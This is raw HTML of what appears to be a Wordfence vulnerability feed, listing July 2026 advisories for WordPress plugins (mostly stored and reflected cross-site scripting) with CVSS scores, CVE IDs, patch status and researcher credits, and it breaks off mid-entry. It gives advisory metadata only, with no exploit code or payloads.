<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0fb0a7-b9f7-42db-b826-fc09090bd817" target="_blank" rel="noopener">Easy Accordion &lt;= 3.1.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;align&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15652" target="_blank" rel="noopener noreferrer">							CVE-2026-15652						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-accordion-free" target="_blank" rel="noopener">Easy Accordion – AI-Powered FAQ &amp; Accordion Blocks, Product FAQ</a> <span class="wfvr-software-slug">[easy-accordion-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb0fb0a7-b9f7-42db-b826-fc09090bd817" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd0ba4b-56f1-4f4b-95f7-28c911c8de09" target="_blank" rel="noopener">GiveWP &lt;= 4.16.3 &#8211; Authenticated (Give Worker+) Stored Cross-Site Scripting via &#8216;twitter_message&#8217; Sequoia Template Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14987" target="_blank" rel="noopener noreferrer">							CVE-2026-14987						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fedex" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8c642c2fccd8e6c253cccc0ac3a6c684.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8c642c2fccd8e6c253cccc0ac3a6c684"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fedex" target="_blank" rel="noopener">FeDEX</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/26a32c073d7e4edde36367c0e7b51808.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26a32c073d7e4edde36367c0e7b51808"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/skyv3il" target="_blank" rel="noopener">skyv3il</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8d0b3f283d2748d1077325cb2522f7ff.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8d0b3f283d2748d1077325cb2522f7ff"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chirita-catalin-andrei-cc99ie" target="_blank" rel="noopener">Chirita Catalin-Andrei (CC99IE) (CC99IE)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/691c3168925c59eae700032d1721a348.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="691c3168925c59eae700032d1721a348"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/amonra" target="_blank" rel="noopener">AmonRa</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd6f772c2edc5370a6f2829036933466.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd6f772c2edc5370a6f2829036933466"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mrproperctf" target="_blank" rel="noopener">MrProperCTF</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd0ba4b-56f1-4f4b-95f7-28c911c8de09" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95b727ee-b410-471b-98f2-7cebd7f64a58" target="_blank" rel="noopener">News Kit Addons For Elementor &lt;= 1.4.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Site Logo Title and Single Author Box Widgets</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11390" target="_blank" rel="noopener noreferrer">							CVE-2026-11390						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/news-kit-elementor-addons" target="_blank" rel="noopener">News Kit Addons For Elementor</a> <span class="wfvr-software-slug">[news-kit-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c54963ce7f0451af98c05e1b494dc7ea.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c54963ce7f0451af98c05e1b494dc7ea"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/romain-deperne" target="_blank" rel="noopener">Romain Deperne (ang3L)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95b727ee-b410-471b-98f2-7cebd7f64a58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9ab836b-2798-43bd-b43b-8b7c7e81d42f" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export &lt;= 3.3.6 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;filter&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15161" target="_blank" rel="noopener noreferrer">							CVE-2026-15161						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-excel-export" target="_blank" rel="noopener">Ninja Forms &#8211; Excel Export</a> <span class="wfvr-software-slug">[ninja-forms-excel-export]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9ab836b-2798-43bd-b43b-8b7c7e81d42f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/110a1b28-50e0-430e-82d4-c254d73836e2" target="_blank" rel="noopener">Smart Custom Fields &lt;= 5.0.7 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via Attachment Title</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2594" target="_blank" rel="noopener noreferrer">							CVE-2026-2594						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-custom-fields" target="_blank" rel="noopener">Smart Custom Fields</a> <span class="wfvr-software-slug">[smart-custom-fields]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/495f7dc5e65ef9d4606321be8446eb13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="495f7dc5e65ef9d4606321be8446eb13"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lukasz-sobanski" target="_blank" rel="noopener">lucsob</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/110a1b28-50e0-430e-82d4-c254d73836e2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f266f9db-a25e-4f50-b3c8-3bea3a7e86ce" target="_blank" rel="noopener">Tickera &lt;= 3.6.0.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;price_wrapper&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13755" target="_blank" rel="noopener noreferrer">							CVE-2026-13755						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">Tickera – Sell Tickets &amp; Manage Events</a> <span class="wfvr-software-slug">[tickera-event-ticketing-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f266f9db-a25e-4f50-b3c8-3bea3a7e86ce" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6f96cec-ddcb-45b2-a28c-b4e7b6f5c719" target="_blank" rel="noopener">WP Customer Area &lt;= 8.3.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;type&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7640" target="_blank" rel="noopener noreferrer">							CVE-2026-7640						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customer-area" target="_blank" rel="noopener">WP Customer Area</a> <span class="wfvr-software-slug">[customer-area]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6f96cec-ddcb-45b2-a28c-b4e7b6f5c719" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a89c812-a643-47c0-bd33-cfb2389a7646" target="_blank" rel="noopener">WP Delicious &lt;= 1.10.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;steps&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15099" target="_blank" rel="noopener noreferrer">							CVE-2026-15099						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</a> <span class="wfvr-software-slug">[delicious-recipes]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4a89c812-a643-47c0-bd33-cfb2389a7646" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd364c5-c053-4c50-8232-bb47ab8e834b" target="_blank" rel="noopener">wpForo Forum &lt;= 3.1.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;location&#8217; Profile Field</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15021" target="_blank" rel="noopener noreferrer">							CVE-2026-15021						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo" target="_blank" rel="noopener">wpForo Forum</a> <span class="wfvr-software-slug">[wpforo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valentin-chamoret" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f9f648dff2da40333953077293a47953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f9f648dff2da40333953077293a47953"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valentin-chamoret" target="_blank" rel="noopener">valent1</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cd364c5-c053-4c50-8232-bb47ab8e834b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10207866-6615-486b-a60a-a522ed8a0285" target="_blank" rel="noopener">Product Feed Manager For WooCommerce &lt;= 7.6.1 &#8211; Reflected Cross-Site Scripting via &#8216;s&#8217; Search Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15306" target="_blank" rel="noopener noreferrer">							CVE-2026-15306						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">Product Feed Manager For WooCommerce – Sell on 200+ Online Marketplaces</a> <span class="wfvr-software-slug">[best-woocommerce-feed]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/10207866-6615-486b-a60a-a522ed8a0285" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8ca87868-357b-4d71-9bf9-cd3b15b2555d" target="_blank" rel="noopener">WooCommerce Placetopay Gateway &lt;= 3.2.2 &#8211; Reflected Cross-Site Scripting via &#8216;redirect-url&#8217;</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11324" target="_blank" rel="noopener noreferrer">							CVE-2026-11324						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay" target="_blank" rel="noopener">WooCommerce Placetopay Gateway</a> <span class="wfvr-software-slug">[https://github.com/placetopay/woocommerce-gateway-placetopay]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-belice" target="_blank" rel="noopener">WooCommerce Placetopay Gateway Belice</a> <span class="wfvr-software-slug">[woocommerce-gateway-placetopay-belice]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-colombia" target="_blank" rel="noopener">WooCommerce Placetopay Gateway Colombia</a> <span class="wfvr-software-slug">[woocommerce-gateway-placetopay-colombia]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-ecuador" target="_blank" rel="noopener">WooCommerce Placetopay Gateway Ecuador</a> <span class="wfvr-software-slug">[woocommerce-gateway-placetopay-ecuador]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-honduras" target="_blank" rel="noopener">WooCommerce Placetopay Gateway Honduras</a> <span class="wfvr-software-slug">[woocommerce-gateway-placetopay-honduras]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-uruguay" target="_blank" rel="noopener">WooCommerce Placetopay Gateway Uruguay</a> <span class="wfvr-software-slug">[woocommerce-gateway-placetopay-uruguay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kw0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cb65b00ccbff9a148fd323568e0d76a7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb65b00ccbff9a148fd323568e0d76a7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kw0" target="_blank" rel="noopener">Joshua Provoste</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8ca87868-357b-4d71-9bf9-cd3b15b2555d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8139f512-7bc9-45ae-83d7-bf496e1ad56d" target="_blank" rel="noopener">WP Hotel Booking &lt;= 2.3.2 &#8211; Reflected Cross-Site Scripting via &#8216;check_in_date&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15094" target="_blank" rel="noopener noreferrer">							CVE-2026-15094						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">WP Hotel Booking</a> <span class="wfvr-software-slug">[wp-hotel-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8139f512-7bc9-45ae-83d7-bf496e1ad56d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20203ff8-34ff-496c-b51c-8cad3ded8bf7" target="_blank" rel="noopener">Autopay dla WooCommerce &lt;= 2.2.27 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
